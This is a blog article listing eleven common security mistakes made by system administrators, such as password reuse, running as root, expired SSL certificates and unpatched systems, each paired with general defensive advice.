Jason Parms

common mistakes by system admin
System administrators are in charge of making computers work in the organization. They are likewise in charge of the uninterrupted operation of the computers in taking care of the business needs. The system administrator’s cognition on system security loopholes and their impact of signals in the business they are managing is a decent asset for any organization. In their line of duty, the system administrators often make some mistakes that can be detrimental to the security system of a company. In this article, few silly mistakes can cause a risk to organizations.

#1 Running scripts with root privileges:

One of the essential concepts of security is confining clients to just the privileges that they require. The same can be and ought to be applied to applications running on your system, just give the benefits that your application requires.

One simple approach to do this is to avoid running applications as root at any given point. When an application utilizes the root privilege, the application can control your server. Upon gaining access to the server, attackers can execute any task. An application with root access can disable the majority of your extra security controls. Some programs may contain bugs and give access to untrustworthy programs to run as root.

#2 Password Reused in control systems:

Often at times, servers are set up with weak administrator passwords or as with other machines in the network. Just like many people do, system administrators use the same passwords on multiple systems. Weak passwords and the recycle of passwords are the causes for breach. With this mistake, attackers have ready access to the entire system. Reuse of Password across different systems by system administrators represents a risk. All a hacker requires to do is to crack one system to access other systems the company uses.

Brute-force attack can easily guess the reused password, therefore, when multiple machines are set up using these passwords, then the problem becomes compounded. Instead of system administrators setting up the same root password on different machines, a key file should be used.

The system administrator’s workstation can have a private key while each server can have a public key, in this case, the private key associated with the public key. The administrator can access all the machines assigned to the network while it would be hard for an attacker, moving laterally into the network, to log in without the valid key. The attacker will have no key to intercept.

#3 Administrator controls and shared accounts:

Administrator accounts are accorded high privileges; they can change critical configuration data or items. Administrators frequently utilize administrator accounts with almost no tracking control. More than one administrator frequently utilizes them by simply sharing the password. At the point when the administrator leaves the organization, the password often stays unaltered. These administrator passwords are habitually not tied to particular people, so the accounts can be utilized to do essentially anything with the least possibility of recognition. They are frequently used to gain unauthorized access to systems.

An organization should change passwords periodically, particularly in the service and administrator accounts. Whenever an administrator leaves the company, one should reset the passwords.

#4 Forget to renew SSL certificate:

Generally, SSL certificates come with validity period – certificate issued date to expiry date. After the expiry, the connection remains unsecured whenever anyone visits the website, users will get an unsecured connection warning. Such warning means that the SSL certificate is either expired or invalid and the transactions to be done on the website will not be safe.

expire ssl

Hackers can take advantage of such website; they just grab the data of customers and use it for malicious activities. System admin generally takes SSL certificate, but they often forget to renew SSL certificate and hence, customers become a victim over such sites.

#5 Failing to monitor log files:

Maintaining system logs on the system: especially if it is a multi-user or networked, is important for a system administrator. Log files come in handy when troubleshooting; they let the administrators see what is happening within a network.

An administrator should keep track of logs and when they were created and know what information they contain. To make it easy for the administrator, save the task of going through all log information, the remedy is to use Log Analyzers or audit tools that are built in. The tools read the log files and report summary and statistics in various forms.

#6 Password plaintext storage:

Storing a password in plaintext often leads to a system compromise and vulnerability risk. When the password is stored in a plain text configuration file, it can cause a risk.

Storing a password in a plain text in a configuration file allows any person to read the file and can get access to the password-protected resource. Good password management principle requires that no password should be stored in plain text. Use of well-known password manager is an ideal key to saving system and users’ password that remain encrypted with specified access control.

#7 Bug reporting:

When people report problems with systems through emails or any bug tracking software, in the description of the issue, they add their usernames and password, which is a challenge to security. At any given time, the issues are accessible to more people than the system administrator only.

Additionally, the bug tracking software can be hacked at any moment. When a bug is found, it should be reviewed by the team and forward to the relevant department. The team should give priority in bug resolving to do things in the right order.

#8 Not keeping systems up to date:

Some administrators tend to be negligent in updating security updates as soon as they are available. Whenever a security patch is available, the administrator should examine the vulnerability studies and the impact on the systems and environment.

The administrator should also verify if the system needs the particular patch and to install if required. It is advisable to patch hardware or software of the system and understand each security loopholes with the connection of system configuration.

#9 Superuser tasks:

An administrator should not give users the ability to access or use privileged commands. When you log in as root, the person has complete control over the system.  This is risky, especially when private information is stored; an attacker can perform any task that he wishes to get the stored data.

If there are no super-user tasks to perform, there is no need to log in as administrator. The user should log in using their personal accounts and use SUDO (Superuser DO) for specified commands as needed.

#10 Not terminating dormant accounts:

Unused accounts are considered a liability in a system. Attackers can target these dormant accounts and exploit them, especially if they have their default passwords. The administrator should disable the unused accounts by editing the passwords file and substitute with a string of characters.

#11 Running unknown scripts:

Even if the administrator trusts a source, they should never assume that a script downloaded over the internet is secure. The administrator should verify whether the executed commands will lead to nefarious actions or not.

Conclusion:

It has become critical for system administrators to keep the systems up and to run always as the internet and information infrastructures become complex and larger. System administrators need to be updated on the systems and networks that they manage. Currently, hackers are evolving new sophisticated techniques, it is quite essential to look into the system and make it strong enough against hacking or data breach.

Leave a Reply

Your email address will not be published. Required fields are marked *